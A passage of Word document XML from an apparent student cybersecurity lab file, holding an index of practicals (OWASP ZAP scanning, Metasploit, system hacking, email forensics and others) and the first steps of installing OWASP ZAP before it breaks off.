          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00785C5C" w:rsidP="00785C5C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00785C5C" w:rsidP="00785C5C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00785C5C" w:rsidP="00785C5C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00785C5C" w:rsidP="00785C5C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                           INDEX</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1183" w:tblpY="250"/>
        <w:tblW w:w="9348" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="65" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2072"/>
        <w:gridCol w:w="5315"/>
        <w:gridCol w:w="1961"/>
      </w:tblGrid>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="00E62C19">
        <w:trPr>
          <w:trHeight w:val="1201"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2072"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12"/>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S. No.  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5315"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5"/>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Contents  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1961"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9"/>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Page no.  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="003D065D">
        <w:trPr>
          <w:trHeight w:val="1745"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2072"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2"/>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1  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5315" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="003D065D" w:rsidP="004750F9">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>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Scan using OWASP ZAP Tool (quick/automated ) .</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00C2655D" w:rsidP="004750F9">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:left="64"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="003D065D">
        <w:trPr>
          <w:trHeight w:val="1558"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2072"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2"/>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2  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5315" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="003D065D" w:rsidP="004750F9">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>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Metasploit Machine Vulnerabilities and Scanning and Hacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00C2655D" w:rsidP="004750F9">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:left="9"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00785C5C" w:rsidRPr="004750F9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="003D065D">
        <w:trPr>
          <w:trHeight w:val="1629"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2072"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2"/>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3  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5315" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="003D065D" w:rsidP="004750F9">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>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Information Gathering and Exploitation  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00C2655D" w:rsidP="004750F9">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:left="9"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="00785C5C" w:rsidRPr="004750F9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="003D065D">
        <w:trPr>
          <w:trHeight w:val="1182"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2072"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2"/>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4  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5315" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="003D065D" w:rsidP="004750F9">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>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System Hacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00C2655D" w:rsidP="004750F9">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:left="9"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidR="00785C5C" w:rsidRPr="004750F9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="003D065D">
        <w:trPr>
          <w:trHeight w:val="1500"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2072" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00785C5C" w:rsidP="004750F9">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:left="2"/>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 xml:space="preserve">5  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5315" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="003D065D" w:rsidP="004750F9">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Exploiting Server Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00C2655D" w:rsidP="004750F9">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:left="9"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D6593D" w:rsidRPr="004750F9" w:rsidTr="003D065D">
        <w:trPr>
          <w:trHeight w:val="1500"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2072" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D6593D" w:rsidRPr="004750F9" w:rsidRDefault="00D6593D" w:rsidP="004750F9">
            <w:pPr>
              <w:ind w:left="2"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5315" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D6593D" w:rsidRPr="004750F9" w:rsidRDefault="00D6593D" w:rsidP="004750F9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Digital Signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D6593D" w:rsidRPr="004750F9" w:rsidRDefault="00C2655D" w:rsidP="004750F9">
            <w:pPr>
              <w:ind w:left="9"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D6593D" w:rsidRPr="004750F9" w:rsidTr="003D065D">
        <w:trPr>
          <w:trHeight w:val="1500"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2072" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D6593D" w:rsidRDefault="00D6593D" w:rsidP="004750F9">
            <w:pPr>
              <w:ind w:left="2"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5315" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D6593D" w:rsidRDefault="00D6593D" w:rsidP="004750F9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Email Forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D6593D" w:rsidRPr="004750F9" w:rsidRDefault="00C2655D" w:rsidP="004750F9">
            <w:pPr>
              <w:ind w:left="9"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
            <w:r w:rsidR="00D6593D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003D065D" w:rsidRPr="004750F9" w:rsidRDefault="003D065D" w:rsidP="00CB6D22">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Scan using OWASP ZAP Tool (quick/automated ) .</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">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5B206184" wp14:editId="0449FB0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CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Install OWASP </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">ZAP Tool and open it </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
